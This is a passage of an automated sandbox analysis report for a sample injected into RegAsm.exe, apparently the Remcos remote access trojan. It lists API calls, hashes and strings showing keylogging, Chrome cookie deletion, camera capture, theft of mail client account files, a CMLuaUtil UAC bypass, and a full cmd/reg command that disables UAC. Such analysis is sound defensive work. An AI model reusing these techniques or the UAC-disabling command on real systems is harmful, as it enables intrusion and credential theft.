                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                          • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                          APIs
                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                            • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                            • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                          • CoUninitialize.OLE32 ref: 00407664
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: InitializeObjectUninitialize_wcslen
                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                          • API String ID: 3851391207-1839356972
                          • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                          • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                          • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                          • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                          APIs
                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                          • GetLastError.KERNEL32 ref: 0040BB22
                          Strings
                          • [Chrome Cookies not found], xrefs: 0040BB3C
                          • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                          • UserProfile, xrefs: 0040BAE8
                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteErrorFileLast
                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                          • API String ID: 2018770650-304995407
                          • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                          • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                          • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                          • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                          Strings
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                          • Rmc-7B1J99, xrefs: 00407715
                          • `.|, xrefs: 004076DF
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-7B1J99$`.|
                          • API String ID: 0-1037171124
                          • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                          • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                          • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                          • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                          APIs
                          • __allrem.LIBCMT ref: 0043ACE9
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                          • __allrem.LIBCMT ref: 0043AD1C
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                          • __allrem.LIBCMT ref: 0043AD51
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 1992179935-0
                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                          • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                          • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                          APIs
                          • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: H_prologSleep
                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                          • API String ID: 3469354165-3054508432
                          • Opcode ID: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                          • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                          • Opcode Fuzzy Hash: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                          • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __cftoe
                          • String ID:
                          • API String ID: 4189289331-0
                          • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                          • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                          • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                          • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                          APIs
                          • _strlen.LIBCMT ref: 10001607
                          • _strcat.LIBCMT ref: 1000161D
                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                          • lstrcatW.KERNEL32(?,?), ref: 1000165A
                          • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                          • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: lstrcatlstrlen$_strcat_strlen
                          • String ID:
                          • API String ID: 1922816806-0
                          • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                          • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                          • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                          • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                          APIs
                          • lstrcatW.KERNEL32(?,?), ref: 10001038
                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: lstrlen$AttributesFilelstrcat
                          • String ID:
                          • API String ID: 3594823470-0
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                          • String ID:
                          • API String ID: 493672254-0
                          APIs
                          • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                          • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          APIs
                          • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                          • _free.LIBCMT ref: 10005B2D
                          • _free.LIBCMT ref: 10005B55
                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                          • _abort.LIBCMT ref: 10005B74
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          APIs
                          • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                          • _free.LIBCMT ref: 004482CC
                          • _free.LIBCMT ref: 004482F4
                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                          • _abort.LIBCMT ref: 00448313
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ControlManager
                          • String ID:
                          • API String ID: 221034970-0
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ControlManager
                          • String ID:
                          • API String ID: 221034970-0
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ControlManager
                          • String ID:
                          • API String ID: 221034970-0
                          APIs
                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                          • API String ID: 4036392271-1520055953
                          APIs
                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                          • wsprintfW.USER32 ref: 0040B22E
                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EventLocalTimewsprintf
                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                          • API String ID: 1497725170-248792730
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: X8|
                          • API String ID: 0-3552716790
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                          • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                          • CloseHandle.KERNEL32(00000000), ref: 0040A729
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSizeSleep
                          • String ID: XQG
                          • API String ID: 1958988193-3606453820
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ClassCreateErrorLastRegisterWindow
                          • String ID: 0$MsgWindowClass
                          • API String ID: 2877667751-2410386613
                          APIs
                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                          • CloseHandle.KERNEL32(?), ref: 004077E5
                          • CloseHandle.KERNEL32(?), ref: 004077EA
                          Strings
                          • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateProcess
                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                          • API String ID: 2922976086-4183131282
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          APIs
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                          • CloseHandle.KERNEL32(?), ref: 00405140
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                          • String ID: KeepAlive | Disabled
                          • API String ID: 2993684571-305739064
                          APIs
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                          • Sleep.KERNEL32(00002710), ref: 0041AE98
                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: PlaySound$HandleLocalModuleSleepTime
                          • String ID: Alarm triggered
                          • API String ID: 614609389-2816303416
                          APIs
                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                          • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                          • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                          Strings
                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                          • API String ID: 3024135584-2418719853
                          • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                          • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
